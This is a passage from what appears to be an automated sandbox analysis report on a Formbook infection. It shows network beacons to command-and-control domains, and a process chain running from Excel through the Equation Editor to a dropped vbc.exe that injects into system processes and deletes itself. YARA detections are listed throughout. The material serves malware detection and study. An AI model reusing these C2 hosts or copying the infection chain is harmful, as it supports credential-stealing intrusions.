                                                                                                                                                        Jan 13, 2021 17:22:24.776473999 CET1093OUTGET /bw82/?x2J8=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&Ab=gXuD_lh8bfV4RN HTTP/1.1
                                                                                                                                                        Host: www.kolamart.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 13, 2021 17:22:24.915277958 CET1094INHTTP/1.1 403 Forbidden
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Wed, 13 Jan 2021 16:22:24 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 275
                                                                                                                                                        ETag: "5ffc8399-113"
                                                                                                                                                        Via: 1.1 google
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        4192.168.2.2249171184.168.131.24180C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2021 17:22:33.220985889 CET1095OUTGET /bw82/?Ab=gXuD_lh8bfV4RN&x2J8=9KGhaNjgEAjOuiPnGmkWJtXE2Tv4ryq1r5IcCqZotckyUU+N2GtErEKHJSdKgyTchgl25w== HTTP/1.1
                                                                                                                                                        Host: www.magnabeautystyle.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 13, 2021 17:22:33.473696947 CET1095INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Server: nginx/1.16.1
                                                                                                                                                        Date: Wed, 13 Jan 2021 16:22:33 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Location: http://magnabeautystyle.wixsite.com/mysite?Ab=gXuD_lh8bfV4RN&x2J8=9KGhaNjgEAjOuiPnGmkWJtXE2Tv4ryq1r5IcCqZotckyUU+N2GtErEKHJSdKgyTchgl25w==
                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Start time:17:19:52
                                                                                                                                                        Start date:13/01/2021
                                                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                        Imagebase:0x13fb90000
                                                                                                                                                        File size:27641504 bytes
                                                                                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:17:20:12
                                                                                                                                                        Start date:13/01/2021
                                                                                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:543304 bytes
                                                                                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:17:20:14
                                                                                                                                                        Start date:13/01/2021
                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                        Imagebase:0x290000
                                                                                                                                                        File size:1007104 bytes
                                                                                                                                                        MD5 hash:D0B2E715C3E584846F591401035609B4
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2169184444.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        Reputation:low

                                                                                                                                                        General

                                                                                                                                                        Start time:17:20:18
                                                                                                                                                        Start date:13/01/2021
                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                        Imagebase:0x290000
                                                                                                                                                        File size:1007104 bytes
                                                                                                                                                        MD5 hash:D0B2E715C3E584846F591401035609B4
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        Reputation:low

                                                                                                                                                        General

                                                                                                                                                        Start time:17:20:20
                                                                                                                                                        Start date:13/01/2021
                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:
                                                                                                                                                        Imagebase:0xffca0000
                                                                                                                                                        File size:3229696 bytes
                                                                                                                                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate

                                                                                                                                                        General

                                                                                                                                                        Start time:17:20:33
                                                                                                                                                        Start date:13/01/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                        Imagebase:0x470000
                                                                                                                                                        File size:101888 bytes
                                                                                                                                                        MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        Reputation:moderate

                                                                                                                                                        General

                                                                                                                                                        Start time:17:20:38
                                                                                                                                                        Start date:13/01/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                        Imagebase:0x49ea0000
                                                                                                                                                        File size:302592 bytes
                                                                                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Code Analysis

                                                                                                                                                        Reset < >